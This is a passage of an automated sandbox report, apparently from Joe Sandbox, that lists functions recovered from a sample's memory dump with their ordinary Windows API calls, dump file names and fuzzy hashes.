Part of subcall function 0100A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0100A598

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: H_prolog$CloseFind
String ID:
API String ID: 2506663941-0
Opcode ID: 6fe45e873539fc8f7c1fe9122511e4b7291e6ff6ba8005cf56c7fcf986602d45
Instruction ID: 5f88e9b963bf67398d26c115f1d1c092a74f3649fe068ad1451095828ce5ad8a
Opcode Fuzzy Hash: 6fe45e873539fc8f7c1fe9122511e4b7291e6ff6ba8005cf56c7fcf986602d45
Instruction Fuzzy Hash: C841D671D446599AEB22DB60CC54AEEB7B8BF54304F0484EBE1CA570D2EB755BC4CB10

Uniqueness

Uniqueness Score: -1.00%

Function 010013E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 010013E1

Part of subcall function 01005E37: __EH_prolog.LIBCMT ref: 01005E3C

Part of subcall function 0100CE40: __EH_prolog.LIBCMT ref: 0100CE45

Part of subcall function 0100B505: __EH_prolog.LIBCMT ref: 0100B50A

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 69312da0c5e037cafb32245d82483277a16830d08c1d6f3a501f4c7bd1ff7e09
Instruction ID: cec93fc24bb8fee3a2c314a4ccbc9c33a426a5b10bb4467c275949e2cd0074e7
Opcode Fuzzy Hash: 69312da0c5e037cafb32245d82483277a16830d08c1d6f3a501f4c7bd1ff7e09
Instruction Fuzzy Hash: 3C4147B0905B419EE725DF398884AEBFBE5BF28300F50492ED5FE87281CB726654CB10

Uniqueness

Uniqueness Score: -1.00%

Function 010013DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 010013E1

Part of subcall function 01005E37: __EH_prolog.LIBCMT ref: 01005E3C

Part of subcall function 0100CE40: __EH_prolog.LIBCMT ref: 0100CE45

Part of subcall function 0100B505: __EH_prolog.LIBCMT ref: 0100B50A

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 9eb4bcadbec23a800fe2701621e87708881efe2a7862c605bcea76c8e421ee3d
Instruction ID: bc2e4b4b238ef7f57742b5714fdac663143d566066f4b237bbba39a9be90b25b
Opcode Fuzzy Hash: 9eb4bcadbec23a800fe2701621e87708881efe2a7862c605bcea76c8e421ee3d
Instruction Fuzzy Hash: C94158B0905B419EE725DF798884AE7FBE5BF28300F50492ED5FE83281CB766654CB10

Uniqueness

Uniqueness Score: -1.00%

Function 0101359E Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 010135A3

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: c9b99c988ad2d294ca9b7982def11ca03ec75c78dba90966cc865cb49ce70c9f
Instruction ID: 6bbc47c5125e93f92a9829e8b88c3abfcbf877bfaeb3b88da8abaf1bf3aae1f8
Opcode Fuzzy Hash: c9b99c988ad2d294ca9b7982def11ca03ec75c78dba90966cc865cb49ce70c9f
Instruction Fuzzy Hash: 8321F8B5E40216AFDB149F78CC406AB76A8FF18214F10457ED546EB689D3B89900C7E8

Uniqueness

Uniqueness Score: -1.00%

Function 0101B093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0101B098

Part of subcall function 010013DC: __EH_prolog.LIBCMT ref: 010013E1

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 74c1b258e60b474d4c8cbae6e72d53797942e2474c0b7d77d88b88ed1dd038b4
Instruction ID: 77947289f8eea9fb37141fcc8883db1782b4c376b04e96639b908dc7cd430865
Opcode Fuzzy Hash: 74c1b258e60b474d4c8cbae6e72d53797942e2474c0b7d77d88b88ed1dd038b4
Instruction Fuzzy Hash: 2A317E71C0024AAFDF15DF68D8509EEBBB4AF19300F50449ED889B7281D739AE04CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0102AC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 0102ACF8

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: fea9311c1bbcc58cf046fc192371e5c0beb6ef37599f657992c8a45585dbf908
Instruction ID: cb2e74e7096d96f92e4c3f95ccaa25d403a0aaedb4e00a7de838c3bdcab58bf7
Opcode Fuzzy Hash: fea9311c1bbcc58cf046fc192371e5c0beb6ef37599f657992c8a45585dbf908
Instruction Fuzzy Hash: B3110A33700639DF9B32AD2CD84099E77D6AB842607264261FDD6EB648DF35DC0187D0

Uniqueness

Uniqueness Score: -1.00%

Function 01009215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0100921A

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: ff71ff36cac491c89ee3df3b949d6564069a63c60eee0b1886ccce2af47c8448
Instruction ID: a5516518c51d1e88399560a690ae40ed458da0b32bbdddd2d6803122b6240b76
Opcode Fuzzy Hash: ff71ff36cac491c89ee3df3b949d6564069a63c60eee0b1886ccce2af47c8448
Instruction Fuzzy Hash: A301A533900929ABDF13ABA8CD809DEB775BFA8654F014115E996B7191DA34C900C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0102C479 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 0102B136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,01029813,00000001,00000364,?,010240EF,?,?,01041098), ref: 0102B177

_free.LIBCMT ref: 0102C4E5

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
Instruction ID: 8542809aa5592354d0549eb23996b790efe3b78644f5571643ab30aa1b88802f
Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
Instruction Fuzzy Hash: 6401DB722003155BF3318E59984596EFBE9FB85270F65055DD5D483281EA30A905C764

Uniqueness

Uniqueness Score: -1.00%

Function 0102B136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,01029813,00000001,00000364,?,010240EF,?,?,01041098), ref: 0102B177

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 0d7a592f149143a72fb815f360b423788a39c0350c7e729b8cb7e1fef950fe7c
Instruction ID: 3734e2a0151760341e89f13a8d2ec74c3a40d283cae5fae9a5574b42db4d069a
Opcode Fuzzy Hash: 0d7a592f149143a72fb815f360b423788a39c0350c7e729b8cb7e1fef950fe7c
Instruction Fuzzy Hash: 89F0B43250513567FB715A26AC05B9F3B88AB91770BB8C151E9C89B190CA30D90183E0

Uniqueness

Uniqueness Score: -1.00%

Function 01023C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 01023C3F

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: ca2948b6215143db9662ff26e1177afafa980f8dbb060494f347ce261efd399f
Instruction ID: 5c654ee7116b342b02a3a46c1418474835b8131b5591d5f59751335c8fee03aa
Opcode Fuzzy Hash: ca2948b6215143db9662ff26e1177afafa980f8dbb060494f347ce261efd399f
Instruction Fuzzy Hash: 4BF0A73220022A9F9F124E6EEC1099A7BD9FF49B207204124FB85DF190DB35E420C790

Uniqueness

Uniqueness Score: -1.00%

Function 01028E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,01024286,?,0000015D,?,?,?,?,01025762,000000FF,00000000,?,?), ref: 01028E38

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 23da378f76d4c47c8473c7dd1037a8afff0fbe1a645b18a4cf04c3fb1a655a31
Instruction ID: 6e3ad07e0d3cb5a1f467e574a9a54423315807e4e8bdd9bd534dc7f4a81142fb
Opcode Fuzzy Hash: 23da378f76d4c47c8473c7dd1037a8afff0fbe1a645b18a4cf04c3fb1a655a31
Instruction Fuzzy Hash: 34E0653960613556EEB126699C04B9F7ACC9F517B4F15C193EDD897080CB65CC0082E1

Uniqueness

Uniqueness Score: -1.00%

Function 01005ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 01005AC2

Part of subcall function 0100B505: __EH_prolog.LIBCMT ref: 0100B50A

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 5c9cb1e471cee9b88f5bcca5426f7c0d36ef21cc8cfb1d0eec12008dffda73da
Instruction ID: 95c004d0d7deed5b4b6e06d9f91013bd735eaeffec939151e846667c64675ba9
Opcode Fuzzy Hash: 5c9cb1e471cee9b88f5bcca5426f7c0d36ef21cc8cfb1d0eec12008dffda73da
Instruction Fuzzy Hash: 1C018C30810695DAD726E7B8C0407DDFBA4BF78204F60888D94DA53285CBB81B08D7A2

Uniqueness

Uniqueness Score: -1.00%

Function 01009620 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(000000FF,?,?,010095D6,?,?,?,?,?,01032641,000000FF), ref: 0100963B

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: ef4ca47a0d06aa223ec60324e11d54b951d612392cf1208fd3d27fbb49532fb2
Instruction ID: b699d0f0767de549242a4d9c844c35bdcdb06aac75e9b6efa8171ecaf4f36f53
Opcode Fuzzy Hash: ef4ca47a0d06aa223ec60324e11d54b951d612392cf1208fd3d27fbb49532fb2
Instruction Fuzzy Hash: 54F089704C1B159FFB328A68C898792B7E86B16325F041B5ED0EA429E1D775618DCB40

Uniqueness

Uniqueness Score: -1.00%

Function 0100A56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 0100A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0100A592,000000FF,?,?), ref: 0100A6C4
Part of subcall function 0100A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0100A592,000000FF,?,?), ref: 0100A6F2
Part of subcall function 0100A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0100A592,000000FF,?,?), ref: 0100A6FE

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0100A598

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: 6d7457f10a0d7fc31f6e8336a68044539e04b98b38a236259cc851e548fa7f16
Instruction ID: 756d466e9db7a9a8472cc89dc540bce24e4fd6ca8a202e3e87f9ba7bc4b1c80d
Opcode Fuzzy Hash: 6d7457f10a0d7fc31f6e8336a68044539e04b98b38a236259cc851e548fa7f16
Instruction Fuzzy Hash: 60F05E35009790EAEA6367B88904BCBBBA46F2A332F048A49F1F9531D5C37650948B22

Uniqueness

Uniqueness Score: -1.00%

Function 01010E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 01010E3D

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: 018f8fb04689d3cc01ebaef76a1c6ea7e7c09f1271b6a04589243b810d072e6b
Instruction ID: a647dc6ef2056e2f0035351e986774ff2540b64a2fcbc12faf9c71d53334b519
Opcode Fuzzy Hash: 018f8fb04689d3cc01ebaef76a1c6ea7e7c09f1271b6a04589243b810d072e6b
Instruction Fuzzy Hash: 05D0C230B0106A16EA6633396494BFE298B9FE6210F0C0065B2C55B2CECAAE0482A261

Uniqueness

Uniqueness Score: -1.00%

Function 0101A626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 0101A62C

Part of subcall function 0101A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0101A3DA

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction ID: b756999aa64b5d282eb878efbe0ab4a01eab456bea9e215b03cb9147fe51894d
Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction Fuzzy Hash: 3DD0A93030120AFAEF426B21CC02AAF7AA9EB58240F008421BCC2C6184EAB9D9109261

Uniqueness

Uniqueness Score: -1.00%

Function 0101E5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadProtectSection.DELAYIMP ref: 0101E5E3

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: DloadProtectSection
String ID:
API String ID: 2203082970-0
Opcode ID: d930e5b9385fd8ca8887850c0ba9ca44294a8aa34f83e07c2a4ec37f781d3a9a
Instruction ID: f24ffd3c0d9de15338cb36a0ee711db0cb88598c4778754a3443df5f911b958a
Opcode Fuzzy Hash: d930e5b9385fd8ca8887850c0ba9ca44294a8aa34f83e07c2a4ec37f781d3a9a
Instruction Fuzzy Hash: F6D012B01402459BE763EBACE445F5C77E9B368B60F800545FEC9D645CEB7D8180D705

Uniqueness

Uniqueness Score: -1.00%

Function 0101DD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,01011B3E), ref: 0101DD92

Part of subcall function 0101B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0101B579
Part of subcall function 0101B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0101B58A
Part of subcall function 0101B568: IsDialogMessageW.USER32(0001042C,?), ref: 0101B59E
Part of subcall function 0101B568: TranslateMessage.USER32(?), ref: 0101B5AC
Part of subcall function 0101B568: DispatchMessageW.USER32(?), ref: 0101B5B6

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: 9b6ed345331ff3b54f0b234b7c94673597f7cb20d0bf0a8d405792b3c2dd822e
Instruction ID: 0dbb338a7048243b39e188002a5bb92d0cb4d8cdd38cea8fbcb1ecc6a1ebdd9b
